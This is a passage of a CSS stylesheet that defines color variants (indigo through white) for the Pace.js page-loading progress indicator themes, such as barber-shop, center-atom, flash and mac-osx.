.pace-indigo .pace .pace-progress {
background: #6610f2;
}
.pace-barber-shop-indigo .pace {
background: #ffffff;
}
.pace-barber-shop-indigo .pace .pace-progress {
background: #6610f2;
}
.pace-barber-shop-indigo .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-indigo .pace .pace-progress::after {
color: rgba(102, 16, 242, 0.2);
}
.pace-bounce-indigo .pace .pace-activity {
background: #6610f2;
}
.pace-center-atom-indigo .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-indigo .pace-progress::before {
background: #6610f2;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-indigo .pace-activity {
border-color: #6610f2;
}
.pace-center-atom-indigo .pace-activity::after, .pace-center-atom-indigo .pace-activity::before {
border-color: #6610f2;
}
.pace-center-circle-indigo .pace .pace-progress {
background: rgba(102, 16, 242, 0.8);
color: #ffffff;
}
.pace-center-radar-indigo .pace .pace-activity {
border-color: #6610f2 transparent transparent;
}
.pace-center-radar-indigo .pace .pace-activity::before {
border-color: #6610f2 transparent transparent;
}
.pace-center-simple-indigo .pace {
background: #ffffff;
border-color: #6610f2;
}
.pace-center-simple-indigo .pace .pace-progress {
background: #6610f2;
}
.pace-material-indigo .pace {
color: #6610f2;
}
.pace-corner-indicator-indigo .pace .pace-activity {
background: #6610f2;
}
.pace-corner-indicator-indigo .pace .pace-activity::after,
.pace-corner-indicator-indigo .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-indigo .pace .pace-activity::before {
border-right-color: rgba(102, 16, 242, 0.2);
border-left-color: rgba(102, 16, 242, 0.2);
}
.pace-corner-indicator-indigo .pace .pace-activity::after {
border-top-color: rgba(102, 16, 242, 0.2);
border-bottom-color: rgba(102, 16, 242, 0.2);
}
.pace-fill-left-indigo .pace .pace-progress {
background-color: rgba(102, 16, 242, 0.2);
}
.pace-flash-indigo .pace .pace-progress {
background: #6610f2;
}
.pace-flash-indigo .pace .pace-progress-inner {
box-shadow: 0 0 10px #6610f2, 0 0 5px #6610f2;
}
.pace-flash-indigo .pace .pace-activity {
border-top-color: #6610f2;
border-left-color: #6610f2;
}
.pace-loading-bar-indigo .pace .pace-progress {
background: #6610f2;
color: #6610f2;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-indigo .pace .pace-activity {
box-shadow: inset 0 0 0 2px #6610f2, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-indigo .pace .pace-progress {
background-color: #6610f2;
box-shadow: inset -1px 0 #6610f2, inset 0 -1px #6610f2, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-indigo .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-indigo .pace-progress {
color: #6610f2;
}
.pace-purple .pace .pace-progress {
background: #6f42c1;
}
.pace-barber-shop-purple .pace {
background: #ffffff;
}
.pace-barber-shop-purple .pace .pace-progress {
background: #6f42c1;
}
.pace-barber-shop-purple .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-purple .pace .pace-progress::after {
color: rgba(111, 66, 193, 0.2);
}
.pace-bounce-purple .pace .pace-activity {
background: #6f42c1;
}
.pace-center-atom-purple .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-purple .pace-progress::before {
background: #6f42c1;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-purple .pace-activity {
border-color: #6f42c1;
}
.pace-center-atom-purple .pace-activity::after, .pace-center-atom-purple .pace-activity::before {
border-color: #6f42c1;
}
.pace-center-circle-purple .pace .pace-progress {
background: rgba(111, 66, 193, 0.8);
color: #ffffff;
}
.pace-center-radar-purple .pace .pace-activity {
border-color: #6f42c1 transparent transparent;
}
.pace-center-radar-purple .pace .pace-activity::before {
border-color: #6f42c1 transparent transparent;
}
.pace-center-simple-purple .pace {
background: #ffffff;
border-color: #6f42c1;
}
.pace-center-simple-purple .pace .pace-progress {
background: #6f42c1;
}
.pace-material-purple .pace {
color: #6f42c1;
}
.pace-corner-indicator-purple .pace .pace-activity {
background: #6f42c1;
}
.pace-corner-indicator-purple .pace .pace-activity::after,
.pace-corner-indicator-purple .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-purple .pace .pace-activity::before {
border-right-color: rgba(111, 66, 193, 0.2);
border-left-color: rgba(111, 66, 193, 0.2);
}
.pace-corner-indicator-purple .pace .pace-activity::after {
border-top-color: rgba(111, 66, 193, 0.2);
border-bottom-color: rgba(111, 66, 193, 0.2);
}
.pace-fill-left-purple .pace .pace-progress {
background-color: rgba(111, 66, 193, 0.2);
}
.pace-flash-purple .pace .pace-progress {
background: #6f42c1;
}
.pace-flash-purple .pace .pace-progress-inner {
box-shadow: 0 0 10px #6f42c1, 0 0 5px #6f42c1;
}
.pace-flash-purple .pace .pace-activity {
border-top-color: #6f42c1;
border-left-color: #6f42c1;
}
.pace-loading-bar-purple .pace .pace-progress {
background: #6f42c1;
color: #6f42c1;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-purple .pace .pace-activity {
box-shadow: inset 0 0 0 2px #6f42c1, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-purple .pace .pace-progress {
background-color: #6f42c1;
box-shadow: inset -1px 0 #6f42c1, inset 0 -1px #6f42c1, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-purple .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-purple .pace-progress {
color: #6f42c1;
}
.pace-pink .pace .pace-progress {
background: #e83e8c;
}
.pace-barber-shop-pink .pace {
background: #ffffff;
}
.pace-barber-shop-pink .pace .pace-progress {
background: #e83e8c;
}
.pace-barber-shop-pink .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-pink .pace .pace-progress::after {
color: rgba(232, 62, 140, 0.2);
}
.pace-bounce-pink .pace .pace-activity {
background: #e83e8c;
}
.pace-center-atom-pink .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-pink .pace-progress::before {
background: #e83e8c;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-pink .pace-activity {
border-color: #e83e8c;
}
.pace-center-atom-pink .pace-activity::after, .pace-center-atom-pink .pace-activity::before {
border-color: #e83e8c;
}
.pace-center-circle-pink .pace .pace-progress {
background: rgba(232, 62, 140, 0.8);
color: #ffffff;
}
.pace-center-radar-pink .pace .pace-activity {
border-color: #e83e8c transparent transparent;
}
.pace-center-radar-pink .pace .pace-activity::before {
border-color: #e83e8c transparent transparent;
}
.pace-center-simple-pink .pace {
background: #ffffff;
border-color: #e83e8c;
}
.pace-center-simple-pink .pace .pace-progress {
background: #e83e8c;
}
.pace-material-pink .pace {
color: #e83e8c;
}
.pace-corner-indicator-pink .pace .pace-activity {
background: #e83e8c;
}
.pace-corner-indicator-pink .pace .pace-activity::after,
.pace-corner-indicator-pink .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-pink .pace .pace-activity::before {
border-right-color: rgba(232, 62, 140, 0.2);
border-left-color: rgba(232, 62, 140, 0.2);
}
.pace-corner-indicator-pink .pace .pace-activity::after {
border-top-color: rgba(232, 62, 140, 0.2);
border-bottom-color: rgba(232, 62, 140, 0.2);
}
.pace-fill-left-pink .pace .pace-progress {
background-color: rgba(232, 62, 140, 0.2);
}
.pace-flash-pink .pace .pace-progress {
background: #e83e8c;
}
.pace-flash-pink .pace .pace-progress-inner {
box-shadow: 0 0 10px #e83e8c, 0 0 5px #e83e8c;
}
.pace-flash-pink .pace .pace-activity {
border-top-color: #e83e8c;
border-left-color: #e83e8c;
}
.pace-loading-bar-pink .pace .pace-progress {
background: #e83e8c;
color: #e83e8c;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-pink .pace .pace-activity {
box-shadow: inset 0 0 0 2px #e83e8c, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-pink .pace .pace-progress {
background-color: #e83e8c;
box-shadow: inset -1px 0 #e83e8c, inset 0 -1px #e83e8c, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-pink .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-pink .pace-progress {
color: #e83e8c;
}
.pace-red .pace .pace-progress {
background: #dc3545;
}
.pace-barber-shop-red .pace {
background: #ffffff;
}
.pace-barber-shop-red .pace .pace-progress {
background: #dc3545;
}
.pace-barber-shop-red .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-red .pace .pace-progress::after {
color: rgba(220, 53, 69, 0.2);
}
.pace-bounce-red .pace .pace-activity {
background: #dc3545;
}
.pace-center-atom-red .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-red .pace-progress::before {
background: #dc3545;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-red .pace-activity {
border-color: #dc3545;
}
.pace-center-atom-red .pace-activity::after, .pace-center-atom-red .pace-activity::before {
border-color: #dc3545;
}
.pace-center-circle-red .pace .pace-progress {
background: rgba(220, 53, 69, 0.8);
color: #ffffff;
}
.pace-center-radar-red .pace .pace-activity {
border-color: #dc3545 transparent transparent;
}
.pace-center-radar-red .pace .pace-activity::before {
border-color: #dc3545 transparent transparent;
}
.pace-center-simple-red .pace {
background: #ffffff;
border-color: #dc3545;
}
.pace-center-simple-red .pace .pace-progress {
background: #dc3545;
}
.pace-material-red .pace {
color: #dc3545;
}
.pace-corner-indicator-red .pace .pace-activity {
background: #dc3545;
}
.pace-corner-indicator-red .pace .pace-activity::after,
.pace-corner-indicator-red .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-red .pace .pace-activity::before {
border-right-color: rgba(220, 53, 69, 0.2);
border-left-color: rgba(220, 53, 69, 0.2);
}
.pace-corner-indicator-red .pace .pace-activity::after {
border-top-color: rgba(220, 53, 69, 0.2);
border-bottom-color: rgba(220, 53, 69, 0.2);
}
.pace-fill-left-red .pace .pace-progress {
background-color: rgba(220, 53, 69, 0.2);
}
.pace-flash-red .pace .pace-progress {
background: #dc3545;
}
.pace-flash-red .pace .pace-progress-inner {
box-shadow: 0 0 10px #dc3545, 0 0 5px #dc3545;
}
.pace-flash-red .pace .pace-activity {
border-top-color: #dc3545;
border-left-color: #dc3545;
}
.pace-loading-bar-red .pace .pace-progress {
background: #dc3545;
color: #dc3545;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-red .pace .pace-activity {
box-shadow: inset 0 0 0 2px #dc3545, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-red .pace .pace-progress {
background-color: #dc3545;
box-shadow: inset -1px 0 #dc3545, inset 0 -1px #dc3545, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-red .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-red .pace-progress {
color: #dc3545;
}
.pace-orange .pace .pace-progress {
background: #fd7e14;
}
.pace-barber-shop-orange .pace {
background: #1F2D3D;
}
.pace-barber-shop-orange .pace .pace-progress {
background: #fd7e14;
}
.pace-barber-shop-orange .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(31, 45, 61, 0.2) 25%, transparent 25%, transparent 50%, rgba(31, 45, 61, 0.2) 50%, rgba(31, 45, 61, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-orange .pace .pace-progress::after {
color: rgba(253, 126, 20, 0.2);
}
.pace-bounce-orange .pace .pace-activity {
background: #fd7e14;
}
.pace-center-atom-orange .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-orange .pace-progress::before {
background: #fd7e14;
color: #1F2D3D;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-orange .pace-activity {
border-color: #fd7e14;
}
.pace-center-atom-orange .pace-activity::after, .pace-center-atom-orange .pace-activity::before {
border-color: #fd7e14;
}
.pace-center-circle-orange .pace .pace-progress {
background: rgba(253, 126, 20, 0.8);
color: #1F2D3D;
}
.pace-center-radar-orange .pace .pace-activity {
border-color: #fd7e14 transparent transparent;
}
.pace-center-radar-orange .pace .pace-activity::before {
border-color: #fd7e14 transparent transparent;
}
.pace-center-simple-orange .pace {
background: #1F2D3D;
border-color: #fd7e14;
}
.pace-center-simple-orange .pace .pace-progress {
background: #fd7e14;
}
.pace-material-orange .pace {
color: #fd7e14;
}
.pace-corner-indicator-orange .pace .pace-activity {
background: #fd7e14;
}
.pace-corner-indicator-orange .pace .pace-activity::after,
.pace-corner-indicator-orange .pace .pace-activity::before {
border: 5px solid #1F2D3D;
}
.pace-corner-indicator-orange .pace .pace-activity::before {
border-right-color: rgba(253, 126, 20, 0.2);
border-left-color: rgba(253, 126, 20, 0.2);
}
.pace-corner-indicator-orange .pace .pace-activity::after {
border-top-color: rgba(253, 126, 20, 0.2);
border-bottom-color: rgba(253, 126, 20, 0.2);
}
.pace-fill-left-orange .pace .pace-progress {
background-color: rgba(253, 126, 20, 0.2);
}
.pace-flash-orange .pace .pace-progress {
background: #fd7e14;
}
.pace-flash-orange .pace .pace-progress-inner {
box-shadow: 0 0 10px #fd7e14, 0 0 5px #fd7e14;
}
.pace-flash-orange .pace .pace-activity {
border-top-color: #fd7e14;
border-left-color: #fd7e14;
}
.pace-loading-bar-orange .pace .pace-progress {
background: #fd7e14;
color: #fd7e14;
box-shadow: 120px 0 #1F2D3D, 240px 0 #1F2D3D;
}
.pace-loading-bar-orange .pace .pace-activity {
box-shadow: inset 0 0 0 2px #fd7e14, inset 0 0 0 7px #1F2D3D;
}
.pace-mac-osx-orange .pace .pace-progress {
background-color: #fd7e14;
box-shadow: inset -1px 0 #fd7e14, inset 0 -1px #fd7e14, inset 0 2px rgba(31, 45, 61, 0.5), inset 0 6px rgba(31, 45, 61, 0.3);
}
.pace-mac-osx-orange .pace .pace-activity {
background-image: radial-gradient(rgba(31, 45, 61, 0.65) 0%, rgba(31, 45, 61, 0.15) 100%);
height: 12px;
}
.pace-progress-color-orange .pace-progress {
color: #fd7e14;
}
.pace-yellow .pace .pace-progress {
background: #ffc107;
}
.pace-barber-shop-yellow .pace {
background: #1F2D3D;
}
.pace-barber-shop-yellow .pace .pace-progress {
background: #ffc107;
}
.pace-barber-shop-yellow .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(31, 45, 61, 0.2) 25%, transparent 25%, transparent 50%, rgba(31, 45, 61, 0.2) 50%, rgba(31, 45, 61, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-yellow .pace .pace-progress::after {
color: rgba(255, 193, 7, 0.2);
}
.pace-bounce-yellow .pace .pace-activity {
background: #ffc107;
}
.pace-center-atom-yellow .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-yellow .pace-progress::before {
background: #ffc107;
color: #1F2D3D;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-yellow .pace-activity {
border-color: #ffc107;
}
.pace-center-atom-yellow .pace-activity::after, .pace-center-atom-yellow .pace-activity::before {
border-color: #ffc107;
}
.pace-center-circle-yellow .pace .pace-progress {
background: rgba(255, 193, 7, 0.8);
color: #1F2D3D;
}
.pace-center-radar-yellow .pace .pace-activity {
border-color: #ffc107 transparent transparent;
}
.pace-center-radar-yellow .pace .pace-activity::before {
border-color: #ffc107 transparent transparent;
}
.pace-center-simple-yellow .pace {
background: #1F2D3D;
border-color: #ffc107;
}
.pace-center-simple-yellow .pace .pace-progress {
background: #ffc107;
}
.pace-material-yellow .pace {
color: #ffc107;
}
.pace-corner-indicator-yellow .pace .pace-activity {
background: #ffc107;
}
.pace-corner-indicator-yellow .pace .pace-activity::after,
.pace-corner-indicator-yellow .pace .pace-activity::before {
border: 5px solid #1F2D3D;
}
.pace-corner-indicator-yellow .pace .pace-activity::before {
border-right-color: rgba(255, 193, 7, 0.2);
border-left-color: rgba(255, 193, 7, 0.2);
}
.pace-corner-indicator-yellow .pace .pace-activity::after {
border-top-color: rgba(255, 193, 7, 0.2);
border-bottom-color: rgba(255, 193, 7, 0.2);
}
.pace-fill-left-yellow .pace .pace-progress {
background-color: rgba(255, 193, 7, 0.2);
}
.pace-flash-yellow .pace .pace-progress {
background: #ffc107;
}
.pace-flash-yellow .pace .pace-progress-inner {
box-shadow: 0 0 10px #ffc107, 0 0 5px #ffc107;
}
.pace-flash-yellow .pace .pace-activity {
border-top-color: #ffc107;
border-left-color: #ffc107;
}
.pace-loading-bar-yellow .pace .pace-progress {
background: #ffc107;
color: #ffc107;
box-shadow: 120px 0 #1F2D3D, 240px 0 #1F2D3D;
}
.pace-loading-bar-yellow .pace .pace-activity {
box-shadow: inset 0 0 0 2px #ffc107, inset 0 0 0 7px #1F2D3D;
}
.pace-mac-osx-yellow .pace .pace-progress {
background-color: #ffc107;
box-shadow: inset -1px 0 #ffc107, inset 0 -1px #ffc107, inset 0 2px rgba(31, 45, 61, 0.5), inset 0 6px rgba(31, 45, 61, 0.3);
}
.pace-mac-osx-yellow .pace .pace-activity {
background-image: radial-gradient(rgba(31, 45, 61, 0.65) 0%, rgba(31, 45, 61, 0.15) 100%);
height: 12px;
}
.pace-progress-color-yellow .pace-progress {
color: #ffc107;
}
.pace-green .pace .pace-progress {
background: #28a745;
}
.pace-barber-shop-green .pace {
background: #ffffff;
}
.pace-barber-shop-green .pace .pace-progress {
background: #28a745;
}
.pace-barber-shop-green .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-green .pace .pace-progress::after {
color: rgba(40, 167, 69, 0.2);
}
.pace-bounce-green .pace .pace-activity {
background: #28a745;
}
.pace-center-atom-green .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-green .pace-progress::before {
background: #28a745;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-green .pace-activity {
border-color: #28a745;
}
.pace-center-atom-green .pace-activity::after, .pace-center-atom-green .pace-activity::before {
border-color: #28a745;
}
.pace-center-circle-green .pace .pace-progress {
background: rgba(40, 167, 69, 0.8);
color: #ffffff;
}
.pace-center-radar-green .pace .pace-activity {
border-color: #28a745 transparent transparent;
}
.pace-center-radar-green .pace .pace-activity::before {
border-color: #28a745 transparent transparent;
}
.pace-center-simple-green .pace {
background: #ffffff;
border-color: #28a745;
}
.pace-center-simple-green .pace .pace-progress {
background: #28a745;
}
.pace-material-green .pace {
color: #28a745;
}
.pace-corner-indicator-green .pace .pace-activity {
background: #28a745;
}
.pace-corner-indicator-green .pace .pace-activity::after,
.pace-corner-indicator-green .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-green .pace .pace-activity::before {
border-right-color: rgba(40, 167, 69, 0.2);
border-left-color: rgba(40, 167, 69, 0.2);
}
.pace-corner-indicator-green .pace .pace-activity::after {
border-top-color: rgba(40, 167, 69, 0.2);
border-bottom-color: rgba(40, 167, 69, 0.2);
}
.pace-fill-left-green .pace .pace-progress {
background-color: rgba(40, 167, 69, 0.2);
}
.pace-flash-green .pace .pace-progress {
background: #28a745;
}
.pace-flash-green .pace .pace-progress-inner {
box-shadow: 0 0 10px #28a745, 0 0 5px #28a745;
}
.pace-flash-green .pace .pace-activity {
border-top-color: #28a745;
border-left-color: #28a745;
}
.pace-loading-bar-green .pace .pace-progress {
background: #28a745;
color: #28a745;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-green .pace .pace-activity {
box-shadow: inset 0 0 0 2px #28a745, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-green .pace .pace-progress {
background-color: #28a745;
box-shadow: inset -1px 0 #28a745, inset 0 -1px #28a745, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-green .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-green .pace-progress {
color: #28a745;
}
.pace-teal .pace .pace-progress {
background: #20c997;
}
.pace-barber-shop-teal .pace {
background: #ffffff;
}
.pace-barber-shop-teal .pace .pace-progress {
background: #20c997;
}
.pace-barber-shop-teal .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-teal .pace .pace-progress::after {
color: rgba(32, 201, 151, 0.2);
}
.pace-bounce-teal .pace .pace-activity {
background: #20c997;
}
.pace-center-atom-teal .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-teal .pace-progress::before {
background: #20c997;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-teal .pace-activity {
border-color: #20c997;
}
.pace-center-atom-teal .pace-activity::after, .pace-center-atom-teal .pace-activity::before {
border-color: #20c997;
}
.pace-center-circle-teal .pace .pace-progress {
background: rgba(32, 201, 151, 0.8);
color: #ffffff;
}
.pace-center-radar-teal .pace .pace-activity {
border-color: #20c997 transparent transparent;
}
.pace-center-radar-teal .pace .pace-activity::before {
border-color: #20c997 transparent transparent;
}
.pace-center-simple-teal .pace {
background: #ffffff;
border-color: #20c997;
}
.pace-center-simple-teal .pace .pace-progress {
background: #20c997;
}
.pace-material-teal .pace {
color: #20c997;
}
.pace-corner-indicator-teal .pace .pace-activity {
background: #20c997;
}
.pace-corner-indicator-teal .pace .pace-activity::after,
.pace-corner-indicator-teal .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-teal .pace .pace-activity::before {
border-right-color: rgba(32, 201, 151, 0.2);
border-left-color: rgba(32, 201, 151, 0.2);
}
.pace-corner-indicator-teal .pace .pace-activity::after {
border-top-color: rgba(32, 201, 151, 0.2);
border-bottom-color: rgba(32, 201, 151, 0.2);
}
.pace-fill-left-teal .pace .pace-progress {
background-color: rgba(32, 201, 151, 0.2);
}
.pace-flash-teal .pace .pace-progress {
background: #20c997;
}
.pace-flash-teal .pace .pace-progress-inner {
box-shadow: 0 0 10px #20c997, 0 0 5px #20c997;
}
.pace-flash-teal .pace .pace-activity {
border-top-color: #20c997;
border-left-color: #20c997;
}
.pace-loading-bar-teal .pace .pace-progress {
background: #20c997;
color: #20c997;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-teal .pace .pace-activity {
box-shadow: inset 0 0 0 2px #20c997, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-teal .pace .pace-progress {
background-color: #20c997;
box-shadow: inset -1px 0 #20c997, inset 0 -1px #20c997, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-teal .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-teal .pace-progress {
color: #20c997;
}
.pace-cyan .pace .pace-progress {
background: #17a2b8;
}
.pace-barber-shop-cyan .pace {
background: #ffffff;
}
.pace-barber-shop-cyan .pace .pace-progress {
background: #17a2b8;
}
.pace-barber-shop-cyan .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.2) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.2) 50%, rgba(255, 255, 255, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-cyan .pace .pace-progress::after {
color: rgba(23, 162, 184, 0.2);
}
.pace-bounce-cyan .pace .pace-activity {
background: #17a2b8;
}
.pace-center-atom-cyan .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-cyan .pace-progress::before {
background: #17a2b8;
color: #ffffff;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-cyan .pace-activity {
border-color: #17a2b8;
}
.pace-center-atom-cyan .pace-activity::after, .pace-center-atom-cyan .pace-activity::before {
border-color: #17a2b8;
}
.pace-center-circle-cyan .pace .pace-progress {
background: rgba(23, 162, 184, 0.8);
color: #ffffff;
}
.pace-center-radar-cyan .pace .pace-activity {
border-color: #17a2b8 transparent transparent;
}
.pace-center-radar-cyan .pace .pace-activity::before {
border-color: #17a2b8 transparent transparent;
}
.pace-center-simple-cyan .pace {
background: #ffffff;
border-color: #17a2b8;
}
.pace-center-simple-cyan .pace .pace-progress {
background: #17a2b8;
}
.pace-material-cyan .pace {
color: #17a2b8;
}
.pace-corner-indicator-cyan .pace .pace-activity {
background: #17a2b8;
}
.pace-corner-indicator-cyan .pace .pace-activity::after,
.pace-corner-indicator-cyan .pace .pace-activity::before {
border: 5px solid #ffffff;
}
.pace-corner-indicator-cyan .pace .pace-activity::before {
border-right-color: rgba(23, 162, 184, 0.2);
border-left-color: rgba(23, 162, 184, 0.2);
}
.pace-corner-indicator-cyan .pace .pace-activity::after {
border-top-color: rgba(23, 162, 184, 0.2);
border-bottom-color: rgba(23, 162, 184, 0.2);
}
.pace-fill-left-cyan .pace .pace-progress {
background-color: rgba(23, 162, 184, 0.2);
}
.pace-flash-cyan .pace .pace-progress {
background: #17a2b8;
}
.pace-flash-cyan .pace .pace-progress-inner {
box-shadow: 0 0 10px #17a2b8, 0 0 5px #17a2b8;
}
.pace-flash-cyan .pace .pace-activity {
border-top-color: #17a2b8;
border-left-color: #17a2b8;
}
.pace-loading-bar-cyan .pace .pace-progress {
background: #17a2b8;
color: #17a2b8;
box-shadow: 120px 0 #ffffff, 240px 0 #ffffff;
}
.pace-loading-bar-cyan .pace .pace-activity {
box-shadow: inset 0 0 0 2px #17a2b8, inset 0 0 0 7px #ffffff;
}
.pace-mac-osx-cyan .pace .pace-progress {
background-color: #17a2b8;
box-shadow: inset -1px 0 #17a2b8, inset 0 -1px #17a2b8, inset 0 2px rgba(255, 255, 255, 0.5), inset 0 6px rgba(255, 255, 255, 0.3);
}
.pace-mac-osx-cyan .pace .pace-activity {
background-image: radial-gradient(rgba(255, 255, 255, 0.65) 0%, rgba(255, 255, 255, 0.15) 100%);
height: 12px;
}
.pace-progress-color-cyan .pace-progress {
color: #17a2b8;
}
.pace-white .pace .pace-progress {
background: #ffffff;
}
.pace-barber-shop-white .pace {
background: #1F2D3D;
}
.pace-barber-shop-white .pace .pace-progress {
background: #ffffff;
}
.pace-barber-shop-white .pace .pace-activity {
background-image: linear-gradient(45deg, rgba(31, 45, 61, 0.2) 25%, transparent 25%, transparent 50%, rgba(31, 45, 61, 0.2) 50%, rgba(31, 45, 61, 0.2) 75%, transparent 75%, transparent);
}
.pace-big-counter-white .pace .pace-progress::after {
color: rgba(255, 255, 255, 0.2);
}
.pace-bounce-white .pace .pace-activity {
background: #ffffff;
}
.pace-center-atom-white .pace-progress {
height: 100px;
width: 80px;
}
.pace-center-atom-white .pace-progress::before {
background: #ffffff;
color: #1F2D3D;
font-size: .8rem;
line-height: .7rem;
padding-top: 17%;
}
.pace-center-atom-white .pace-activity {
border-color: #ffffff;
}
.pace-center-atom-white .pace-activity::after, .pace-center-atom-white .pace-activity::before {
border-color: #ffffff;
}
.pace-center-circle-white .pace .pace-progress {
background: rgba(255, 255, 255, 0.8);
color: #1F2D3D;
}
.pace-center-radar-white .pace .pace-activity {
border-color: #ffffff transparent transparent;
}
.pace-center-radar-white .pace .pace-activity::before {
border-color: #ffffff transparent transparent;
}
.pace-center-simple-white .pace {
background: #1F2D3D;
border-color: #ffffff;
}
.pace-center-simple-white .pace .pace-progress {
background: #ffffff;
}
.pace-material-white .pace {
color: #ffffff;
}
.pace-corner-indicator-white .pace .pace-activity {
background: #ffffff;
}
.pace-corner-indicator-white .pace .pace-activity::after,
.pace-corner-indicator-white .pace .pace-activity::before {
border: 5px solid #1F2D3D;
}
.pace-corner-indicator-white .pace .pace-activity::before {
border-right-color: rgba(255, 255, 255, 0.2);
border-left-color: rgba(255, 255, 255, 0.2);
}
.pace-corner-indicator-white .pace .pace-activity::after {
border-top-color: rgba(255, 255, 255, 0.2);
border-bottom-color: rgba(255, 255, 255, 0.2);
}
.pace-fill-left-white .pace .pace-progress {
background-color: rgba(255, 255, 255, 0.2);
}
.pace-flash-white .pace .pace-progress {
background: #ffffff;
}
